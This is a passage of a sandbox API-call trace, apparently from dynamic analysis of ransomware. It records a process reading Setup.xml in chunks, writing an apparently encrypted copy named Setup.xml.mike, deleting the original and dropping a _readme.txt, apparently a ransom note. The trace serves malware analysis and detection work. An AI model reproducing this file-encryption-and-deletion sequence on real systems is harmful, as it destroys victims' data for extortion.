ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976)) returned 1 [0041.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.777] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20dbc1c | out: lpFileInformation=0x20dbc1c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976)) returned 1 [0041.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.777] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.777] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.778] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.778] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.778] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.778] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.778] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.778] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.778] GetFileType (hFile=0x264) returned 0x1 [0041.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.778] GetFileType (hFile=0x264) returned 0x1 [0041.778] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.778] WriteFile (in: hFile=0x264, lpBuffer=0x20dca98*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20dca98*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.780] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x20dc5a0 | out: lpFileInformation=0x20dc5a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976)) returned 1 [0041.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.780] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.780] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.780] GetFileType (hFile=0x264) returned 0x1 [0041.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.780] GetFileType (hFile=0x264) returned 0x1 [0041.780] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.780] ReadFile (in: hFile=0x264, lpBuffer=0x20ddbc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20ddbc0*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.783] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.783] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.783] GetFileType (hFile=0x264) returned 0x1 [0041.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.783] GetFileType (hFile=0x264) returned 0x1 [0041.784] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.784] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.784] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.784] GetFileType (hFile=0x264) returned 0x1 [0041.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.784] GetFileType (hFile=0x264) returned 0x1 [0041.784] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0041.784] ReadFile (in: hFile=0x264, lpBuffer=0x20eeae8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20eeae8*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.785] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.785] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.785] GetFileType (hFile=0x264) returned 0x1 [0041.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.785] GetFileType (hFile=0x264) returned 0x1 [0041.785] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0041.786] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.786] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.786] GetFileType (hFile=0x264) returned 0x1 [0041.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.786] GetFileType (hFile=0x264) returned 0x1 [0041.786] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x5000 [0041.786] ReadFile (in: hFile=0x264, lpBuffer=0x20fbaa8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20fbaa8*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.787] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.787] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.787] GetFileType (hFile=0x264) returned 0x1 [0041.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.787] GetFileType (hFile=0x264) returned 0x1 [0041.787] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x5220 [0041.787] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.787] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.787] GetFileType (hFile=0x264) returned 0x1 [0041.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.787] GetFileType (hFile=0x264) returned 0x1 [0041.788] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x7800 [0041.788] ReadFile (in: hFile=0x264, lpBuffer=0x2108a68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2108a68*, lpNumberOfBytesRead=0x2af110*=0x176, lpOverlapped=0x0) returned 1 [0041.788] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.788] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.788] GetFileType (hFile=0x264) returned 0x1 [0041.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.788] GetFileType (hFile=0x264) returned 0x1 [0041.788] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x7a20 [0041.788] WriteFile (in: hFile=0x264, lpBuffer=0x210c1f8*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x210c1f8*, lpNumberOfBytesWritten=0x2af104*=0x180, lpOverlapped=0x0) returned 1 [0041.789] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.789] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.789] GetFileType (hFile=0x264) returned 0x1 [0041.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.789] GetFileType (hFile=0x264) returned 0x1 [0041.790] WriteFile (in: hFile=0x264, lpBuffer=0x210f420*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x210f420*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.790] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe319e0e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe319e0e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7ba0)) returned 1 [0041.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.790] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2110b9c | out: lpFileInformation=0x2110b9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe319e0e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe319e0e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe31c4240, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7ba0)) returned 1 [0041.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.790] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.791] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0041.791] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.791] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0041.792] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.792] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.792] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.792] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.792] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.793] GetFileType (hFile=0x264) returned 0x1 [0041.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.793] GetFileType (hFile=0x264) returned 0x1 [0041.793] WriteFile (in: hFile=0x264, lpBuffer=0x2112880*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2112880*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.794] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.794] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 